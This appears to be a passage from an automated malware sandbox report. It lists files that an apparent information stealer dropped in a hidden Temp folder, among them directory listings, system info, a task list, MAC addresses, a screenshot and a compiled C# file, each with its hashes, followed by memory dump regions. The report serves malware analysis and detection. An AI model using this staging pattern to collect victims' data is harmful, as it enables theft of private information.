                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Desktop.txt

                                                                              Filesize

                                                                              577B

                                                                              MD5

                                                                              3a4cc74170c5ed86570749509a19202b

                                                                              SHA1

                                                                              afe1e42ec986bff8d274c9cf0cf1305aa00cebae

                                                                              SHA256

                                                                              6ac6ae22838703788781afe0e8b9584bf400aff021f2ce94ada2e24f40c57aca

                                                                              SHA512

                                                                              822f16a54851c7d0f2c71e7f3244641ee4add7156bcf4dad0eceea0c216d83ecfadc483e97178f5c193151c98bb51fac9d3bf66c5e9df06aa5c9a46fe52d80ec

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Documents.txt

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              098655ec10af9311e9a0755f51ad46bc

                                                                              SHA1

                                                                              a282f26c11e7932cf94c14f89dba9dedcb2b5c1b

                                                                              SHA256

                                                                              51cd02360fe43913f51162faab8370791a15de47d3888262d5c4a837c6bdc07a

                                                                              SHA512

                                                                              a531eeaa027817c8378f764524e20368c9e14b2baacbaa8da3278378e0c3d98c9678fa4b15e4f9fbfe5309b61451519f420478f5af3f0fcd3d10bde9e32f36bb

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Downloads.txt

                                                                              Filesize

                                                                              770B

                                                                              MD5

                                                                              d83fdc5e15db35b70fbdfa503d8e2a79

                                                                              SHA1

                                                                              5e6d9040392a45900922a513ac94bfba74f714bc

                                                                              SHA256

                                                                              d25aeab2751cffad0941b1da1593250ab4cef527b54e19d6bd7f17c691041c22

                                                                              SHA512

                                                                              afc144a7b53d3f70fb5bae10ea3069412108d3541140bbde71e37c06eea7d9f9639f63c1b0151d09d343f835891817c8804829b35ff67eb64b52e65db0355082

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Music.txt

                                                                              Filesize

                                                                              370B

                                                                              MD5

                                                                              bc09d72466e0db13184ff902f65dbdfb

                                                                              SHA1

                                                                              e7a4eff7e194f75d448ea5b5f0f29ff3971330ec

                                                                              SHA256

                                                                              c382aa321fae17cdfa9cf834498364e8be860a7d6e7ebcee49d4d4978a86e834

                                                                              SHA512

                                                                              d98f4c83306928c4247e6af6fc4bb4637c9b9aa6d4bf05f070a51e81285214fc03e60e17de6a4dcb0a6161d069bb06ffe775cda09f622e48e4a65d10fd7fe11f

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Pictures.txt

                                                                              Filesize

                                                                              345B

                                                                              MD5

                                                                              337c198ce66a2b4c32b0f88334df5c54

                                                                              SHA1

                                                                              a60072923feeddc60e7256b4d1e34539d61acf5b

                                                                              SHA256

                                                                              0e35d2219ad667e58f72ec4a3fd3449665f7178c45c8f53fc0ea7b761c364fa8

                                                                              SHA512

                                                                              fd463dc7848a9d70d185a7173c1fba6483cf0ac7909ba3d80d0fc8253a33763d9a457ab5e119da04dfd065555ebe4f72088697824b207aebaf024e5c6bbf790a

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Directories\Videos.txt

                                                                              Filesize

                                                                              30B

                                                                              MD5

                                                                              e140e10b2b43ba6f978bee0aa90afaf7

                                                                              SHA1

                                                                              bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                                                              SHA256

                                                                              c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                                                              SHA512

                                                                              df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \Display (1).png

                                                                              Filesize

                                                                              427KB

                                                                              MD5

                                                                              d9c17be9c3321978285efff89c4f536b

                                                                              SHA1

                                                                              50e174ea8c3c7098f18b64bcb948d1cccfe6b517

                                                                              SHA256

                                                                              5b614e6994bc98424af4add5a2fd97faba68b2b5c0e4a831389c881e40d78d9c

                                                                              SHA512

                                                                              8e7eabc0228700d5663a0f208b50a492bfaa2f37180e7967fd73a188ea38734035e0933ef66aca2635149e70324cb658e583a844423738b88ddfb10485140af5

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \System\MAC Addresses.txt

                                                                              Filesize

                                                                              232B

                                                                              MD5

                                                                              bc29a20f34f7615cee86324e37a60823

                                                                              SHA1

                                                                              71946ec4db5f41240e6c25068125b2ddfc076dc5

                                                                              SHA256

                                                                              f6a47a58a157a0fd901f89af7191cb7591a4ef3594fdbd740b82963cd9f1e572

                                                                              SHA512

                                                                              e2dc7aa6e81e92620357251e3418e70159b9b9af18079fd93d7d57aba7aa89d1981fc84ef1b0ea041a978dbb9217f0086f37acc115541d9adfdcc2208524eb5f

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \System\System Info.txt

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              1cf032bc9931ab00420b8af6d7051ea1

                                                                              SHA1

                                                                              156263805460d2b9673c7caa4e322ccbd1f1af60

                                                                              SHA256

                                                                              780556f6cd93b01d0877cc6c9688434e5fbe038e1479ac8bc0d1dccf192435c7

                                                                              SHA512

                                                                              c602eb7d149cef1db78d5dad709c679eeb6bc924a4648ea9bb8324e661e8e0aa3e161b2df5d900cc29134e4dbb9b6dd3bf30dd61cbd3bdc0b0600192e645c721

                                                                            • C:\Users\Admin\AppData\Local\Temp\          \System\Task List.txt

                                                                              Filesize

                                                                              13KB

                                                                              MD5

                                                                              a1122219d656f1b771bfa3bfc4573acd

                                                                              SHA1

                                                                              9073fcb81fac0da7f0c51e0fb62a25eb42b6f231

                                                                              SHA256

                                                                              3fa0cc05414c811b70e65708155b4f2741560286b7cda2bf86b69d07cca1ad0e

                                                                              SHA512

                                                                              9316662a47bba8bf53ce04c5c9f07ded6c96af318fdcd94f3cbee8530d0e53ce689dc13911eafa5087e52482dcc89887a4f8849f3b19911022c03997378f0948

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\c2tdhx4c\CSCDD15B25B891F4536AB5EC26FA43B555E.TMP

                                                                              Filesize

                                                                              652B

                                                                              MD5

                                                                              602f468adc8d821db21ea259b420beed

                                                                              SHA1

                                                                              bf8e7fdb014a738a6f184bae7b41f0ff7da8b24b

                                                                              SHA256

                                                                              8907a3bab48b4ff1955cd50fd69912083dab19864e927ef615d5514201d4cc28

                                                                              SHA512

                                                                              6c99fea890eadad30d6fe14c416a7769ee3820d06348517af2befa462e63456e7b134e793b4dd7b1cc4ebd7b3b9b74bc5f8355b8a906efbd4e97ba7fbbcaaf7e

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\c2tdhx4c\c2tdhx4c.0.cs

                                                                              Filesize

                                                                              1004B

                                                                              MD5

                                                                              c76055a0388b713a1eabe16130684dc3

                                                                              SHA1

                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                              SHA256

                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                              SHA512

                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\c2tdhx4c\c2tdhx4c.cmdline

                                                                              Filesize

                                                                              607B

                                                                              MD5

                                                                              2efbe41ecca03f3904800142318928a6

                                                                              SHA1

                                                                              09cb0226a31b66cd2bc9778347c18eb506a107d4

                                                                              SHA256

                                                                              7b96accbd8758c8c2bdd45a1482c062822cc2049c4d9b6ccebd6f2790101d468

                                                                              SHA512

                                                                              2b0b0649035cce2a8cbec1e14a95f451c2f2c5694734388bdd5acf3b83a770da8a9bda0dbf87c902c98688fef95e1bff997acf7400590b2b2d922a010f0539f8

                                                                            • memory/2308-91-0x000001E525260000-0x000001E525282000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/2448-151-0x00000245DBBB0000-0x00000245DBBB8000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/2600-117-0x0000000000E30000-0x0000000000E42000-memory.dmp

                                                                              Filesize

                                                                              72KB

                                                                            • memory/3764-118-0x00007FFA197C0000-0x00007FFA197E4000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/3764-153-0x00007FFA19070000-0x00007FFA191EF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/3764-80-0x00007FFA21B70000-0x00007FFA21B7F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/3764-81-0x00007FFA19A00000-0x00007FFA19A14000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/3764-82-0x00007FFA1CBB0000-0x00007FFA1CBBD000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/3764-85-0x00007FFA18F50000-0x00007FFA1906A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/3764-83-0x00007FFA197F0000-0x00007FFA1981D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/3764-72-0x00007FFA09B40000-0x00007FFA0A205000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/3764-75-0x00007FFA09600000-0x00007FFA09B33000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-76-0x00007FFA19820000-0x00007FFA19845000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/3764-73-0x00007FFA19420000-0x00007FFA194EE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/3764-74-0x000001CD6EF00000-0x000001CD6F433000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-68-0x00007FFA19780000-0x00007FFA197B3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/3764-66-0x00007FFA1CCE0000-0x00007FFA1CCED000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/3764-64-0x00007FFA1CB20000-0x00007FFA1CB39000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/3764-62-0x00007FFA19070000-0x00007FFA191EF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/3764-247-0x00007FFA19780000-0x00007FFA197B3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/3764-248-0x00007FFA19420000-0x00007FFA194EE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/3764-249-0x000001CD6EF00000-0x000001CD6F433000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-269-0x00007FFA09600000-0x00007FFA09B33000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-289-0x00007FFA197F0000-0x00007FFA1981D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/3764-297-0x000001CD6EF00000-0x000001CD6F433000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-296-0x00007FFA19420000-0x00007FFA194EE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/3764-295-0x00007FFA19780000-0x00007FFA197B3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/3764-294-0x00007FFA1CCE0000-0x00007FFA1CCED000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/3764-293-0x00007FFA1CB20000-0x00007FFA1CB39000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/3764-292-0x00007FFA19070000-0x00007FFA191EF000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/3764-291-0x00007FFA197C0000-0x00007FFA197E4000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/3764-290-0x00007FFA1E5A0000-0x00007FFA1E5BA000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/3764-288-0x00007FFA21B70000-0x00007FFA21B7F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/3764-287-0x00007FFA19820000-0x00007FFA19845000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/3764-286-0x00007FFA09600000-0x00007FFA09B33000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/3764-285-0x00007FFA18F50000-0x00007FFA1906A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/3764-284-0x00007FFA1CBB0000-0x00007FFA1CBBD000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/3764-283-0x00007FFA19A00000-0x00007FFA19A14000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/3764-271-0x00007FFA09B40000-0x00007FFA0A205000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/3764-60-0x00007FFA197C0000-0x00007FFA197E4000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/3764-58-0x00007FFA1E5A0000-0x00007FFA1E5BA000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/3764-56-0x00007FFA197F0000-0x00007FFA1981D000-memory.dmp

                                                                              Filesize

                                                                              180KB

                                                                            • memory/3764-33-0x00007FFA21B70000-0x00007FFA21B7F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/3764-30-0x00007FFA19820000-0x00007FFA19845000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/3764-26-0x00007FFA09B40000-0x00007FFA0A205000-memory.dmp

                                                                              Filesize

                                                                              6.8MB